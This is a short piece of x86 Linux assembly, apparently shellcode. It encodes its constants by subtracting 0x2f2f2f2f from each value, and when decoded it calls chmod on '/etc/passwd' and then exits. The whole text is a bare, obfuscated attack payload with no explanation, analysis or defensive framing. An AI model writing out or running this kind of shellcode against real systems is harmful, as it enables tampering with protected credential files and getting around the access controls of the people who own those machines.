push $0x2f2f2f2f
pop %eax
push $0x3ebfbfbf
pop %ebx
sub %eax,%ebx
shr $0x10,%ebx
shr $0x08,%ebx
push %ebx
pop    %eax
push $0x2f2f2f2f
pop %ebx
push $0x3053bfbf
pop %ecx
sub %ebx,%ecx
push %ecx
pop %ecx
shr $0x10,%ecx
push $0x2f2f2f2f
pop %ebx
push $0x93a6a2bf
pop %edx
sub %ebx,%edx
push %edx
pop %ebx
shr    $0x8,%ebx
push %ebx
push $0x2f2f2f2f
pop %ebx
push $0xa2909f5e
pop %edx
sub %ebx,%edx
push %edx
push $0x2f2f2f2f
pop %ebx
push $0x92a3945e
pop %edx
sub %ebx,%edx
push %edx
mov    %esp,%ebx
int    $0x80
mov    $0x01,%al
mov    $0x01,%bl
int    $0x80
